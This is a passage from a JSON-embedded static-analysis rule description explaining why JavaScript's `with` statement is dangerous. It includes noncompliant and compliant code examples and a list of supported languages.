But use <code>with<\/code> to access\nsome property not already set in the object, and suddenly you're catapulted out of the object scope and into the global scope, creating or overwriting\nvariables there. Since the effects of <code>with<\/code> are entirely dependent on the object passed to it, <code>with<\/code> can be dangerously\nunpredictable, and should never be used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x = 'a';\n\nvar foo = {\n y: 1\n}\n\nwith (foo) { \/\/ Noncompliant\n y = 4; \/\/ updates foo.x\n x = 3; \/\/ does NOT add a foo.x property; updates x var in outer scope\n}\nprint(foo.x + \" \" + x); \/\/ shows: undefined 3\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar x = 'a';\n\nvar foo = {\n y: 1\n}\n\nfoo.y = 4;\nfoo.x = 3;\n\nprint(foo.x + \" \" + x); \/\/ shows: 3 a\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"BUG"}],"language":"js","languages":{"cs":"C#","java":"Java","js":"JavaScript","objc":"Objective C","php":"PHP","swift":"Swift","vbnet":"VB.NET","android":"Android","py":"Python"},"ranktag":"^rank\\d$"};- Exclude checks